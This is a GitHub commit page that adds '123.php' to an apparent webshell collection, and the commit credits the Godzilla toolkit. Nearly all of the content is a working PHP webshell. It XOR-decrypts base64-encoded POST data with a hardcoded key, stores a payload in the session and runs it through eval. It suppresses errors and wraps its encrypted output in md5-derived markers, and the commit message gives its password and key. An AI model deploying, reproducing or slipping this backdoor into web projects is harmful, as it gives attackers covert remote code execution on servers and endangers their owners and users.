Skip to content

Commit

Permalink
Create 123.php
Browse files Browse the repository at this point in the history
pass:123,key:123
from: https://github.com/BeichenDream/Godzilla/
author: BeichenDream πŸ‘
  • Loading branch information
tennc authored Aug 18, 2020
1 parent 9b50a0c commit 245ef6f
Showing 1 changed file with 34 additions and 0 deletions.
34 changes: 34 additions & 0 deletions Godzilla/123.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
<?php
session_start();
@set_time_limit(0);
@error_reporting(0);
function E($D,$K){
for($i=0;$i<strlen($D);$i++) {
$D[$i] = $D[$i]^$K[$i+1&15];
}
return $D;
}
function Q($D){
return base64_encode($D);
}
function O($D){
return base64_decode($D);
}
$P='123';
$V='payload';
$T='202cb962ac59075b';
if (isset($_POST[$P])){
$F=O(E(O($_POST[$P]),$T));
if (isset($_SESSION[$V])){
$L=$_SESSION[$V];
$A=explode('|',$L);
class C{public function nvoke($p) {eval($p."");}}
$R=new C();
$R->nvoke($A[0]);
echo substr(md5($P.$T),0,16);
echo Q(E(@run($F),$T));
echo substr(md5($P.$T),16);
}else{
$_SESSION[$V]=$F;
}
}

0 comments on commit 245ef6f

Please sign in to comment.